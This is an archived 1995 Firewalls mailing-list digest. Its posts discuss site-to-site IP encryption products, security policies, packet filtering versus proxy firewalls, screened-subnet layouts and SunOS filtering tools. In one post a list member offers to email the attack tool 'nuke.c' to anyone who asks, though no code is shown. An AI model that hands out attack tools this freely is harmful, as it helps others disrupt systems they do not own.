Subject: Re: Firewalls-Digest V4 #279
To: long-morrow@CS.YALE.EDU (H Morrow Long)
Date: Wed, 3 May 1995 06:52:37 -0400 (EDT)
Cc: firewalls@greatcircle.com
In-Reply-To: <199505021540.AA28630@SPARKY.CF.CS.YALE.EDU> from "H Morrow Long" at May 2, 95 11:40:50 am
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text
Content-Length: 1507
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> >
> > Dear Fellow Firewallers,
> >
> > Does anybody know of a firewall other than TIS's Gauntlet or Raptor's
> > Eagle/Eaglet that does IP encryption? (This is where the TCP(UDP)/IP
> > packet is encrypted and a destination IP address prepended for another
> > firewall across the Internet. Once received at the destination
> > firewall, the encrypted packet is decrypted and sent to the appropriate
> > host) I am not asking this due to problems with TIS or Raptor, but as
> > a result of trying to complete some research into this area.
> >
> [snipped bit about Morningstar]
> NSC (Network Systems Corporation) has a router that can encrypt the body
> of IP datagrams but leave the IP headers unencrypted so that they may be
                           ^^^^^^^^^^^^^^^^^^^^^^

Actually, the entire datagram including IP headers is encrypted and encapsulated in another datagram with an address of the end point router. In this way an eavesdropper will know only that the two routers are talking, nothing about the end stations.
And before you ask, packet frag and defrag capabilities are built in, however, if you also run compression it's likely that datagram fragmentation will not be required. The compression is done before the encryption. > routed over an internet. The feature that implements this on their > router is called DPF for Data Privacy Facility. > > You can find out more about it at the URL http://www.network.com/. > > - Morrow > > From firewalls-owner Wed May 3 05:16:34 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA22542 for firewalls-outgoing; Wed, 3 May 1995 04:37:48 -0700 Received: from relay1.UU.NET (relay1.UU.NET [192.48.96.5]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id EAA22535 for ; Wed, 3 May 1995 04:37:44 -0700 Received: from rssi by relay1.UU.NET with SMTP id QQyocs16193; Wed, 3 May 1995 07:38:02 -0400 Received: from pail.rssi.com by rssi (4.1/SMI-4.1) id AA13933; Wed, 3 May 95 07:35:46 EDT Received: by pail.rssi.com (5.0/SMI-SVR4) id AA04205; Wed, 3 May 1995 07:37:12 +0500 Date: Wed, 3 May 1995 07:37:12 +0500 From: bvvanor@rssi.rssi.com (Brad VanOrden) Message-Id: <9505031137.AA04205@pail.rssi.com> To: Firewalls@GreatCircle.COM Cc: pstingley@smtpgate.ssmc.noaa.gov Subject: IP Encryption Content-Length: 546 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Patrick Stingley asked about IP encryption firewalls. I've been working recently with a device made by Wang that performs this function. It is called a TIU. It basically secures everything behind it by encrypting all the outgoing datagrams and placing a new header on each stating that it is the source. It can only talk to other TIUs. Traffic on the unsecure network looks like it is only between the two TIUs. If anyone is interested, I can get you the full name of the device and a POC. 
Regards, Brad Van Orden Rapid Systems Solutions From firewalls-owner Wed May 3 05:45:35 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA23449 for firewalls-outgoing; Wed, 3 May 1995 05:19:09 -0700 Received: from snmpmgr.state.tn.us (snmpmgr.state.tn.us [170.142.1.74]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id FAA23443 for ; Wed, 3 May 1995 05:19:06 -0700 Received: from langate.tnet.state.tn.us (langate.state.tn.us) by snmpmgr.state.tn.us with SMTP id AA29278 (5.67b/IDA-1.5 for ); Wed, 3 May 1995 07:14:18 -0500 Received: from tn01-Message_Server by langate.tnet.state.tn.us with Novell_GroupWise; Wed, 03 May 1995 07:23:45 -0500 Message-Id: X-Mailer: Novell GroupWise 4.1 Date: Wed, 03 May 1995 07:20:23 -0500 From: "Samuel T. Baker" To: firewalls@greatcircle.com Subject: PC site security Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Christopher J. Calabrese > Network Security Architect > Novell Information Services & Technology, Summit,NJ > cjc@summit.novell.com > > PC clients that are visible to the world don't currently > constitute a security problem I believe this should be understood with the caveat that *no* packages with daemons for telnet, ftp, ... are installed on the PC nor is the PC running server software such as X-windows. > - - Don't rely on your security policy to keep users > from installing software that will compromise your site. > They may install software they don't even _know_ is > a security risk. IMHO the vast majority of NetWare LAN Administrators (perhaps not CNEs) are also unaware of how easy it is to install software packages that will compromise a site with daemons. Samuel T. 
Baker
Tennessee Treasury Department
sbaker@mail.state.tn.us
615-532-8026

From firewalls-owner Wed May 3 06:10:06 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA23670 for firewalls-outgoing; Wed, 3 May 1995 05:27:54 -0700
Received: from relay1.UU.NET (relay1.UU.NET [192.48.96.5]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id FAA23661 for ; Wed, 3 May 1995 05:27:50 -0700
Received: from rssi by relay1.UU.NET with SMTP id QQyocv22448; Wed, 3 May 1995 08:28:10 -0400
Received: from pail.rssi.com by rssi (4.1/SMI-4.1) id AA14118; Wed, 3 May 95 08:25:54 EDT
Received: by pail.rssi.com (5.0/SMI-SVR4) id AA04391; Wed, 3 May 1995 08:27:20 +0500
Date: Wed, 3 May 1995 08:27:20 +0500
From: bvvanor@rssi.rssi.com (Brad VanOrden)
Message-Id: <9505031227.AA04391@pail.rssi.com>
To: firewalls@greatcircle.com
Cc: casares@ix.netcom.com, s0ujgg@pacific.fnma.COM
Subject: Re: Policies
Content-Length: 1019
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Joe Wrote:
>Our organization is in need of a policy/standard for future Internet
>connection. Would anyone out there be willing to share example
>policies that they might have in place. Or provide pointers online
>where examples might exist.

Michael Wrote:
>Our organization is in the same boat. Are there any outlines available?

I hope both are asking for copies to see if there might be any points they missed, or to see how someone else worded a particular subject. A security policy is a management statement based on a thorough analysis. You need to identify for management the vulnerabilities of your systems and networks; their real and perceived threats; and the available countermeasures to those threats. Once management has this information, it can start asking: "OK, if we leave ourselves vulnerable to this threat, what will it cost us?" "What will it cost to implement a countermeasure?" From then on, it is a cost-benefit decision.

My two cents worth.
Brad Van Orden
Rapid Systems Solutions

From firewalls-owner Wed May 3 06:51:36 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA24832 for firewalls-outgoing; Wed, 3 May 1995 06:05:58 -0700
Received: from mwunix.mitre.org (mwunix.mitre.org [128.29.154.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA24827 for ; Wed, 3 May 1995 06:05:52 -0700
Received: from smiley.sit (smiley.mitre.org [128.29.140.20]) by mwunix.mitre.org (8.6.10/8.6.4) with SMTP id JAA27654 for ; Wed, 3 May 1995 09:06:13 -0400
Received: from [128.29.140.130] (mckenney-mac) by smiley.sit (4.1/SMI-4.1) id AA29022; Wed, 3 May 95 09:05:04 EDT
Date: Wed, 3 May 95 09:05:03 EDT
Message-Id:
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
To: firewalls@GreatCircle.COM
From: mckenney@smiley.mitre.org (Brian W. McKenney)
Subject: Firewall-to-Firewall Encryption Products
Cc: mckenney@smiley.mitre.org
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

The following products are able to encrypt network traffic based on source/destination address. Some are also able to encrypt based on the type of network service (port). As a result, sites could create a Virtual Private Network on the Internet. I will post more details on my survey soon to this list. I just want to know if there are other commercially available products that provide similar functionality. Note that one would need two boxes in order to provide for site-to-site encryption over the Internet.

Products are:

ANS InterLock Service
 - Supports optional DES software.

Milkyway Black Hole
 - Supports modified (proprietary) DES algorithm (DES++).

Cisco Systems/Cylink
 - Software solution (part of Cisco operating system) later this
   calendar year, hardware board to follow.

Hughes NetLOCK
 - Supports DES and cXOR.

IRE
 - Available later this calendar year.

KarlBrouter
 - Supports software DES.

Network Systems Corp. (NSC)
 - Security Router offers encryption using IDEA, DES, Triple DES,
   and high speed proprietary algorithms.

Morningstar EXPRESS Router
 - Supports DES.

Motorola Network Encryption System (NES)

Raptor Systems
 - Will be offering DES encryption package.

Semaphore Communications
 - Network Encryption Unit (NEU), supports DES.

swIPe
 - Publicly available.

TIS Gauntlet 3.0
 - Supports software DES option and hardware DES board.
   Includes resellers of Gauntlet.

UUNET LanGuardian
 - Combination of hardware and software DES.


---Background

Date: Wed, 1 Mar 95 09:24:56 EST
Mime-Version: 1.0
To: firewalls@GreatCircle.COM
From: mckenney@smiley.mitre.org (Brian W. McKenney)
Subject: Firewall-to-Firewall Encryption
Cc: mckenney@smiley

I am looking for information on commercial off-the-shelf (COTS) encryption products that can be used to provide firewall-to-firewall encryption (node-to-node). The device would encrypt based on source/destination address and if possible by network service (port).

One of our customers has a network of firewalls and they would like to protect their network traffic over the Internet (firewall-to-firewall) but still be able to communicate with the outside world. The firewall configuration is the same at each of the nodes. At the present time, a user must go through a challenge/response sequence at each firewall. The customer is exploring security technologies that could eliminate the need for a challenge/response dialogue at each firewall.

Inbound connections (e.g., TELNET, FTP, dial-in) from a user that is not behind a node firewall would still be required to go through a challenge/response dialogue (strong authentication) at the firewall.

Respectfully,

Brian W.
McKenney Mail Stop: Z-202 The MITRE Corporation 7525 Colshire Drive McLean, VA 22102 Voice: 703-883-5463 Fax: 703-883-1397 E-Mail: mckenney@mitre.org From firewalls-owner Wed May 3 07:01:11 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA25034 for firewalls-outgoing; Wed, 3 May 1995 06:11:50 -0700 Received: from Toro.Com (LYNUX35.TORO.COM [170.92.1.180]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA25027 for ; Wed, 3 May 1995 06:11:46 -0700 From: Maurice.Yergeau@Toro.Com Received: by lynux36.toro.com (Smail3.1.28.1 #3) id m0s6e6x-00024RC; Wed, 3 May 95 08:05 CDT Message-Id: Date: Wednesday, 3 May 1995 8:11am CT To: firewalls@greatcircle.com Subject: packet filtering software Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am looking for some software to do packet filtering that will run on a sunos box. I was told that TIS toolkit did this sort of thing but can't find it in the documentation. Does anyone know if TIS does packet filtering or of some software that does? any help is greatly appreciated. maurice.yergeau@toro.com From firewalls-owner Wed May 3 07:39:56 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA24042 for firewalls-outgoing; Wed, 3 May 1995 05:40:37 -0700 Received: from real.com (eagle.real.com [199.97.122.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id FAA24037 for ; Wed, 3 May 1995 05:40:31 -0700 Date: Wed, 3 May 1995 08:40:24 -0400 From: bret@real.com (Bret McDanel) Received: by real.com (8.6.8.1/3.2.012693-Realistic Technologies Inc); id IAA18781 for firewalls@greatcircle.com; Wed, 3 May 1995 08:40:24 -0400 Message-Id: <199505031240.IAA18781@real.com> To: firewalls@greatcircle.com Subject: Re: nuke vs firewalls Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Thanks, but nope, taint in there. 
Done got one copy of nuke.c > but there usually be several versions of these critters hacked to varying > extents, so that some are more useful than others. Still looking. > > Come on you CERT and CIAC and DISA d00dz, where can I find nuke? > I emailed you nuke seperatly (dont think that Brent will take to kindly to the code being posted to his list :) If anyone else wants it, drop me a line, and I'll send it out.. And because some people dont know, you need root to run nuke (it opens a raw socket).. From firewalls-owner Wed May 3 07:49:32 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA24105 for firewalls-outgoing; Wed, 3 May 1995 05:43:15 -0700 Received: from uu10.psi.com (uu10.psi.com [38.8.4.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id FAA24100 for ; Wed, 3 May 1995 05:43:11 -0700 Received: from po.gis.prc.com by uu10.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; id AA00503 for Firewalls@greatcircle.com; Wed, 3 May 95 08:43:29 -0400 Message-Id: Date: 3 May 1995 08:41:29 -0500 From: "Heiser Jay" Subject: Proxy vs filtering: Where's the beef? To: Firewalls@greatcircle.com X-Mailer: Mail*Link SMTP/MS 3.0.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Every single firewall digest includes the ongoing religious argument about filtering routers vs. proxy servers. Where's the evidence that either is less secure than the other? Around & around we go with "My firewall's better than your firewall!" (set to music, if you're old enough to remember 60's TV commercials ;-) but I don't see any evidence beyond vague theoretical arguments. Which firewalls are breaking right now? What products and technologies are not making it? What is being succesfully hacked right now as we read this? 
From firewalls-owner Wed May 3 08:08:09 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA25636 for firewalls-outgoing; Wed, 3 May 1995 06:34:30 -0700
Received: from relay4.UU.NET (relay4.UU.NET [192.48.96.14]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA25631 for ; Wed, 3 May 1995 06:34:27 -0700
Received: from relay.tis.com by relay4.UU.NET with SMTP id QQyoda10870; Wed, 3 May 1995 09:34:47 -0400
Received: from sol.tis.com(192.33.112.100) by relay.tis.com via smap (g3.0) id sma011818; Wed, 3 May 95 09:32:51 -0400
Received: from sol.tis.com by tis.com (4.1/SUN-5.64) id AA14310; Wed, 3 May 95 09:33:26 EDT
Message-Id: <9505031333.AA14310@tis.com>
To: bwern@jax.jaxnet.com, Firewalls@greatcircle.com
From: Frederick M Avolio
Subject: Re: Help with begining options?
In-Reply-To: <199505020700.DAA27248@jax.jaxnet.com> Tue, 2 May 1995 03:00:55 -0400
Date: Wed, 03 May 95 09:33:25 -0400
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

1. If you won't get money for it, don't do it. Security is too important. You need to establish that there is a business requirement for your company to connect up to the Internet. Then you need to establish what the risks are. The cost model should show that it is worth spending money to protect your assets or it will show that you don't need an Internet connection enough to justify the cost. The middle ground of "scrimping" does not belong in the equation.

2. No "sacrificial lamb" systems. Any system on the DMZ has to be protected as well as the firewall. Why? Because I have never yet met someone in business who was willing to have any of their systems broken into.
Reasons: 1) The report in the NY Times will just say you were hacked, not that it was a sacrificial system (or if it does, it'll say it somewhere 10 pages into the paper); 2) your sacrificial lamb system will be used as a jump off point to launch attacks against MIT or against some elementary school in Arizona or against whitehouse.gov; 3) your lamb will be used as a storage point for recipes for bombs or for kiddie porn; and 4) the term "sacrificial" you will find pertains to you and your job, not the system :-).

Fred

From firewalls-owner Wed May 3 08:23:02 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA26709 for firewalls-outgoing; Wed, 3 May 1995 07:08:45 -0700
Received: from oxygen.house.gov (oxygen.house.gov [137.18.128.6]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id HAA26702 for ; Wed, 3 May 1995 07:08:38 -0700
Received: by oxygen.house.gov (AIX 3.2/UCB 5.64/3.2.083191-) id AA05453; Wed, 3 May 1995 10:08:05 -0400
Date: Wed, 3 May 1995 10:08:05 -0400
From: johns@oxygen.house.gov (John Schnizlein)
Message-Id: <9505031408.AA05453@oxygen.house.gov>
To: Firewalls@GreatCircle.COM, janb@olymp.fer.uni-lj.si
Subject: Re: Screened subnet with one router?
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> Is there any difference in the security of a screened subnet firewall
> using two routers (one serial-ethernet, the second ethernet-ethernet)
> opposed to using one router with serial-ethernet-ethernet interfaces?
>
> ---------------------------------------------------------------------
>
> First design:
>
>              --      DMZ      --
> Internet -->|R1|-------------|R2|----- inside net
>              --    bastion    --
>                     host
>
> ---------------------------------------------------------------------
>
> The second one:
>
>              --
> Internet -->|R1|------- inside net
>              --
>         b.   |
>         host |DMZ
>              |
>              -

One advantage of the first design is that you may need/want to have different routing policies, in addition to different packet filtering, in R1 than R2. A disadvantage is that, if the bastion is subverted, it is in the best place to sniff all your Internet traffic. This is not true of the second design. With the second design you will have more than one internal interface, so preventing source address spoofing will require the screen on incoming packets, which Cisco (e.g.) software only supports in more recent versions.

-- John

From firewalls-owner Wed May 3 09:23:29 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA28405 for firewalls-outgoing; Wed, 3 May 1995 08:01:17 -0700
Received: from relay1.UU.NET (relay1.UU.NET [192.48.96.5]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA28400 for ; Wed, 3 May 1995 08:01:12 -0700
Received: from rssi by relay1.UU.NET with SMTP id QQyodg22212; Wed, 3 May 1995 11:01:16 -0400
Received: from pail.rssi.com by rssi (4.1/SMI-4.1) id AA15117; Wed, 3 May 95 10:58:52 EDT
Received: by pail.rssi.com (5.0/SMI-SVR4) id AA05969; Wed, 3 May 1995 11:00:18 +0500
Date: Wed, 3 May 1995 11:00:18 +0500
From: bvvanor@rssi.rssi.com (Brad VanOrden)
Message-Id: <9505031500.AA05969@pail.rssi.com>
To: firewalls@greatcircle.com
Cc: casares@ix.netcom.com, guido@kitty.lss.cp.philips.com, mark@mentat.com, mckenney@smiley.mitre.org, py4@dspy4.dsrd.ornl.gov
Subject: RE: IP Encryption - Wang TIU
Content-Length: 325
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

In response to all the requests, here is the POC info for the WANG Trusted Interface Unit (TIU):

Sales: A. Ann Horton 301-657-5267
Engineer: Bill O'Neil 617-967-1439

I'm sorry I don't have any of the specs with me, but it is certified by NSA for TS/SCI level. Hope this helps!
Brad Van Orden Rapid Systems Solutions From firewalls-owner Wed May 3 10:08:49 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA28248 for firewalls-outgoing; Wed, 3 May 1995 07:58:42 -0700 Received: from aruba.lerc.nasa.gov (aruba.lerc.nasa.gov [139.88.35.16]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA28242 for ; Wed, 3 May 1995 07:58:39 -0700 Received: from brahams.lerc.nasa.gov by aruba.lerc.nasa.gov with SMTP (950215.SGI.8.6.10/LeRC/DLW/TAF(1.24-main)) id KAA28396; Wed, 3 May 1995 10:59:03 -0400 Received: by brahams.lerc.nasa.gov (5.x/LeRC/DLW/TAF(1.23-local)) id AA13810; Wed, 3 May 1995 10:58:58 -0400 Date: Wed, 3 May 1995 10:58:57 -0400 (EDT) From: vick To: "Brian W. McKenney" Cc: firewalls@GreatCircle.COM, mckenney@smiley.mitre.org Subject: Re: Firewall-to-Firewall Encryption Products In-Reply-To: Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk As a follow on to the initial request... Will any of these OTS technologies handle video conferencing? That is: encrypting the video/audio from one node to another v On Wed, 3 May 1995, Brian W. McKenney wrote: > > The following products are able to encrypt network traffic based on > source/destination address. Some are also able to encrypt based on the > type of network service (port). As a result, sites could create a Virtual > Private Network on the Internet. I will post more details on my survey > soon to this list. I just want to know if there are other commercially > available products that provide similar functionality. Note that one would > need two boxes in order to provide for site-to-site encryption over the > Internet. > > Products are: > > ANS InterLock Service > - Supports optional DES software. > > Milkyway Black Hole > - Supports modified (proprietary) DES algorithm (DES++). 
> > Cisco Systems/Cylink > - Software solution (part of Cisco operating system) later this > calendar year, hardware board to follow. > > Hughes NetLOCK > - Supports DES and cXOR. > > IRE > - Available later this calendar year. > > KarlBrouter > - Supports software DES. > > Network Systems Corp. (NSC) > - Security Router offers encryption using IDEA, DES, Triple DES, > and high speed proprietary algorithms. > > Morningstar EXPRESS Router > - Supports DES. > > Motorola Network Encryption System (NES) > > Raptor Systems > - Will be offering DES encryption package. > > Semaphore Communications > - Network Encryption Unit (NEU), supports DES. > > swIPe > - Publicly available. > > TIS Gauntlet 3.0 > - Supports software DES option and hardware DES board. > Includes resellers of Gauntlet. > > UUNET LanGuardian > - Combination of hardware and software DES. > > > ---Background > > Date: Wed, 1 Mar 95 09:24:56 EST > Mime-Version: 1.0 > To: firewalls@GreatCircle.COM > From: mckenney@smiley.mitre.org (Brian W. McKenney) > Subject: Firewall-to-Firewall Encryption > Cc: mckenney@smiley > > I am looking for information on commercial off-the-shelf (COTS) encryption > products that can be used to provide firewall-to-firewall encryption > (node-to-node). The device would encrypt based on source/destination > address and if possible by network service (port). > > One of our customers has a network of firewalls and they would like to > protect their network traffic over the Internet (firewall-to-firewall) but > still be able to communicate with the outside world. The firewall > configuration is the same at each of the nodes. At the present time, a > user must go through a challenge/response sequence at each firewall. The > customer is exploring security technologies that could eliminate the need > for a challenge/response dialogue at each firewall. 
> > Inbound connections (e.g., TELNET, FTP, dial-in) from a user that is not > behind a node firewall would still be required to go through a > challenge/response dialogue (strong authentication) at the firewall. > > > Respectfully, > > Brian W. McKenney Mail Stop: Z-202 > The MITRE Corporation 7525 Colshire Drive > McLean, VA 22102 > > Voice: 703-883-5463 Fax: 703-883-1397 > E-Mail: mckenney@mitre.org > > > ----------------------------------------------------------------------------- Vick Kiff (RMS Technolgies, Inc.) | Unix Systems Administrator NASA Lewis Research Center | SpaceCommunications Division (SCd) 21000 Brookpark Rd | 216-433-6547 Cleveland, Ohio 44135 | email: vick@lerc.nasa.gov ----------------------------------------------------------------------------- "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart From firewalls-owner Wed May 3 10:25:33 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA00282 for firewalls-outgoing; Wed, 3 May 1995 08:53:39 -0700 Received: from orpheus.amdahl.com (orpheus.amdahl.com [129.212.11.6]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id IAA00277 for ; Wed, 3 May 1995 08:53:32 -0700 Received: from brittany.oes.amdahl.com by orpheus.amdahl.com with smtp (Smail3.1.29.1 #1) id m0s6ggt-0000IyC; Wed, 3 May 95 08:50 PDT Received: by brittany.oes.amdahl.com (5.0/SMI-4.1/DNS) id AA15602; Wed, 3 May 1995 08:53:23 +0800 Date: Wed, 3 May 1995 08:53:23 +0800 From: patrick@oes.amdahl.com (Patrick Horgan) Message-Id: <9505031553.AA15602@brittany.oes.amdahl.com> To: alan@mid.net Subject: Re: Help with begining options? 
Cc: firewalls@greatcircle.com, firewall@oes.amdahl.com X-Sun-Charset: US-ASCII content-length: 2793 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > If you develop a firewalling system that allows returning packets simply on the > basis of the "ack" bit, then you are risking significant exposure. A proxy > firewall is the best solution to this, which is why I'm a big fan of TIS > and their product, which we resell. However, if you only want the 80 percent > security, then plop the money down to one of the packet filtering vendors. > > Good luck. This is misleading. I'm not going to start up with the challenge for people to come up with security holes in a packet filtering firewall that aren't in a application proxying firewall, I'll just summarize the results of last time. The concensus was that you can provide good security either way, that most people when using a packet filtering firewall would want to disallow inbound connections, and that a combination of filtering outbound, and proxying for any required inbound was nice. It used to be that packet filtering had an advantage for transparency, but that's changing. The proxying firewalls used to have an advantage that if you wanted to hide all your inbound addresses (something that we've argued to a consensus that it doesn't buy you security, MANY times;) they would let you do that. The filtering firewalls such as firewall-1 are doing this now or will soon. They also let you have the choice of passing addresses through, giving the people inside connectivity just as if they were directly connected to the internet, (they are;) while still providing security. The ftp and udp solutions offered by vendors like Checkpoint are something quite nice, allowing you to use unmodified clients and still connect to the net, but again, some of the proxy stuff is moving this way. The different types of firewalls seem to be cross pollinating, and it's harder and harder to tell them apart. 
To tell someone that whatever you happen to be reselling is inherently
better when it's not, is understandable, but questionable. Instead you
should be telling them of its advantages without bashing the competition. It
just makes you look better. Sell your services by selling them.

Why does this industry look more and more like politics?

Patrick

--
These opinions are mine, and not Amdahl's (except by coincidence;).
Patrick J. Horgan        Amdahl Corporation
patrick@amdahl.com       1250 East Arques Avenue          Have Sword
Phone : (408)992-2779    P.O. Box 3470 M/S 316            Will Travel
FAX   : (408)773-0833    Sunnyvale, CA 94088-3470         O16-2294

From firewalls-owner Wed May 3 10:38:06 1995
Date: Wed, 3 May 95 10:04:03 CDT
From: ted@gw.lsli.com
To: firewalls@greatcircle.com
Subject: Firewall to Firewall encryption

You left LSLI's PORTUS firewall off your list.

-------------------------------------
ted@gw.lsli.com
Livermore Software Laboratories, Inc.
Houston, Texas
http://www.sccsi.com/lsli/lsli.homepage.html
05/03/95
"It was the nineties and thanks to the internet, the whole world could hear
what some nerd thinks about Star Trek."
    - Homer Simpson
-------------------------------------

From firewalls-owner Wed May 3 10:39:18 1995
Date: Wed, 3 May 1995 09:52:09 +0800
From: patrick@oes.amdahl.com (Patrick Horgan)
To: bwern@jax.jaxnet.com
Cc: firewalls@greatcircle.com
Subject: Re: Help with beginning options?

> My understanding is that using a filter on the ip layer (like FWTK would
> provide), relied on ack packets, which could be forged. A proxy takes care
> of that problem, and would allow me to allow those services to only be
> originated from within the internal network, correct?

A filter on the ip layer would only fall prey to ack packets being forged if
other things were broken. It's well understood how to secure this. This is
not a reason to choose one approach over the other. There are advantages,
(though disappearing as they copy each other,) to each approach to a
firewall, but either can be done securely.

Patrick

--
These opinions are mine, and not Amdahl's (except by coincidence;).
Patrick J. Horgan        Amdahl Corporation
patrick@amdahl.com       1250 East Arques Avenue          Have Sword
Phone : (408)992-2779    P.O. Box 3470 M/S 316            Will Travel
FAX   : (408)773-0833    Sunnyvale, CA 94088-3470         O16-2294

From firewalls-owner Wed May 3 10:44:49 1995
Date: Wed, 3 May 1995 11:18:07 -0400
From: long-morrow@CS.YALE.EDU (H Morrow Long)
To: Maurice.Yergeau@Toro.Com, firewalls@greatcircle.com
Subject: Re: packet filtering software

>From: Maurice.Yergeau@Toro.Com
>Date: Wednesday, 3 May 1995 8:11am CT
>To: firewalls@greatcircle.com
>Subject: packet filtering software
>
>I am looking for some software to do packet filtering that will run on a sunos
>box. I was told that TIS toolkit did this sort of thing but can't find it in
>the documentation. Does anyone know if TIS does packet filtering or of some
>software that does?
>
>any help is greatly appreciated.
>
>maurice.yergeau@toro.com

The TIS commercial Gauntlet product they sell and the freely available --
though not necessarily public domain -- FWTK (FireWall ToolKit) that they
have on their anonymous FTP server (ftp.tis.com) implement a "Bastion Host
running Application Gateways" firewall vs. a packet filtering (a.k.a.
screening router) approach.
If you want a screening router a modified 'screend' runs on SunOS (but the
README file says that that port was done by Vixie Enterprises consulting and
the modified SunOS kernel sources necessary to get it to run on SunOS are
not distributed with the std screend package which you can get at
ftp://coast.cs.purdue.edu/pub/mirrors/ftp.vix.com/screend/.) and the
commercial product known as Firewall-1 from Checkpoint Technologies
( http://WWW.CheckPoint.com/ ) runs on a Sun box and can provide packet
filtering (and much more than straight packet filtering).

- Morrow

From firewalls-owner Wed May 3 11:05:54 1995
Date: Wed, 03 May 1995 10:03:23 -0400
From: mjsus@atlanta.com (Markku Saarelainen)
To: firewalls@GreatCircle.COM
Subject: Re: Policies

>ey missed, or to see how someone else worded a particular subject.
>
>A security policy is a management statement based on a thorough
>analysis. You need to identify for management the vulnerabilities of
>your systems and networks; their real and perceived threats; and the
>available countermeasures to those threats. Once management has this
>information, it can start asking: "OK, if we leave ourselves vulnerable
>to this threat, what will it cost us?" "What will it cost to implement
>a countermeasure?"
>From then on, it is a cost-benefit decision.
>

My one cent worth ...

I suggest that you go to the library and read the Computer Security Journal
(for example, Volume X Number 2 or 1). Or you may also take a look at the
COM-SAC Journals, Computer Security Auditing and Controls. Please, see the
general outline (table of contents) for the Information Security System
Manual. For any details, please contact me directly (mjsus@atlanta.com).

I hope that this helped a little.

Information Security System (ISS) Manual

 1. Index
 2. Manual Revision Log
 3. Statement of Ownership and Authority
 4. Scope and Applicability
 5. ISS Manual Distribution List
 6. Definitions of Terms
 7. Information Security Policy and Objectives
 8. Management Responsibility
 9. Information Security System
10. Client / Customer Contract Security
11. Information Systems Design and Development
12. Document Control
13. Purchasing Information Security
14. Facility Management and Security
15. Information Systems Management
16. Information Security System Audit
17. Personnel and Employee Security
18. Legal Information Security Matters
19. Counter Information Security System Activities
20. Information Security Insurance Administration

Attachment
    ISS Organization Chart
    ISS Responsibility Descriptions
    Code of Ethics in the Information Management
    Confidentiality / Nondisclosure Agreement

My Best Regards,

Markku JS

*****************************************************************
Markku J. Saarelainen         Tel: U.S.A-(404)-998-7855
P.O.Box 1672                  FAX: U.S.A-(404)-998-7855
Roswell, GA 30077, USA        Email: mjsus@atlanta.com

DISCLAIMER
No thought written in this message is a statement of any organization by
which I am employed or for which I work.
*****************************************************************

From firewalls-owner Wed May 3 11:13:34 1995
Date: Wed, 3 May 1995 12:47:02 -0400 (EDT)
From: Ben
To: Marco Polo, Matthew Elvey, firewalls@greatcircle.com
Subject: Security professionals at the Pentagon (fwd)

Who feels secure knowing that this is the case at our local government
offices?

Ben.

---------- Forwarded message ----------
Date: Wed, 3 May 95 08:45:20 CDT
From: Mike McNally
To: cypherpunks@toad.com
Subject: Security professionals at the Pentagon

I kinda hate to make fun of this poor guy, but I'm in one of those funny
moods and I just can't help myself. I'll cross out his name as a token
gesture of niceness.

======================================================================
[ from comp.unix.admin ]

Hi guys... Hope you can help me out... Here is: I need as much info as
possible by, tomorrow, Thursday at the latest. Our office is having a big
problem with wanting to givem, the about 300-400 customers anonymous FTP.
There is a big security concern. I need you to research as much as you can
about a program named "chroot()". I stumbled across this in a book called
"Internet ...". Mail me everything you can find out about this... Millions
thanx for your help...
chroot() - is supposed to be a program that restricts any outside user from
accessing anything outside of the structure they are directed to

-----------------------------------------------------------------------
Xxxxxx X. Xxxxxx - DISA - Pentagon
XxXxXxX@selma.hq.af.mil
AIX System Administrator (Computer Programmer)
(XXX) XXX-XXXX TTY {via VA Relay Ctr XXX-XXX-XXXX}
-----------------------------------------------------------------------

--
